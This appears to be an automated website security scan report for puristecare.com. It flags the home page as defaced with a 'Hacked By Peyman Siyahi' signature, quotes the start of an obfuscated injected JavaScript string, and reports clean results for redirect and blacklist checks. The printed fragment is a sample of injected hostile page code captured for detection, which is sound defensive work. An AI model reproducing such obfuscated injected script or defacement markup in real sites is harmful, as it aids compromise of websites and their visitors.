Scanned pages/files
Request | Server response | Status |
http://www.puristecare.com/ | 200 OK Content-Length: 12993 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By Peyman Siyahi <html>
<head> <meta content="Hacked By Peyman Siyahi" name="subject"> <meta content="Hacked By Peyman Siyahi" name="Abstract"> <meta content="Hacked By Peyman Siyahi" name="description"> <SCRIPT> var x = "_=(\"Y}RrO[c%8Cm%91%5Cp%86%89%87%90Y}bbJVj%91%89p%91Hm%91XS%87" + "%91Y%5Cp%86%89%91z%89dwwqQ^]b%8Aw%91V_v%91]%89%8EV_Q%91%89d^%85qQ_^Q%8" + "7%91Y}J_^%8EVjSbb%87%90Y}bbJVj%91Hm%91XS%87%91Y%5Cp%86%89%91z%89dwwqQ^" + " ...[13236 bytes skipped]... | ||
http://www.puristecare.com/test404page.js | 404 Not Found Content-Length: 34922 Content-Type: text/html | clean |
http://www.puristecare.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=4.1.5 | 200 OK Content-Length: 386 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/real-time-twitter/js/jquery.jtweetsanywhere-1.3.1.min.js?ver=1.3.1 | 200 OK Content-Length: 30993 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/real-time-twitter/js/jtweetsanywhere-de-1.3.1.min.js?ver=1.3.1 | 200 OK Content-Length: 946 Content-Type: application/javascript | clean |
http://platform.twitter.com/anywhere.js?id=KmxsGWdbeYa1gHOIS9AjA&v=1&ver=4.1.5 | 200 OK Content-Length: 531 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/real-time-twitter/js/jquery.jslidery-0.1.0.js?ver=0.1.0 | 200 OK Content-Length: 5341 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-includes/js/hoverIntent.min.js?ver=r7 | 200 OK Content-Length: 1116 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js?ver=4.1.5 | 200 OK Content-Length: 146005 Content-Type: application/x-javascript | clean |
http://www.puristecare.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.9.1.66518b9 | 200 OK Content-Length: 53014 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.9.1.66518b9 | 200 OK Content-Length: 14438 Content-Type: application/javascript | clean |
http://www.puristecare.com/wp-content/plugins/ubermenu/js/hoverIntent.js?ver=4.1.5 | 200 OK Content-Length: 1464 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: puristecare.com
Result:
GET / HTTP/1.1
Host: puristecare.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: puristecare.com
Referer: http://www.google.com/search?q=puristecare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: puristecare.com
Referer: http://www.google.com/search?q=puristecare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=puristecare.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://puristecare.com/
Result: puristecare.com is not infected or malware details are not published yet.
Result: puristecare.com is not infected or malware details are not published yet.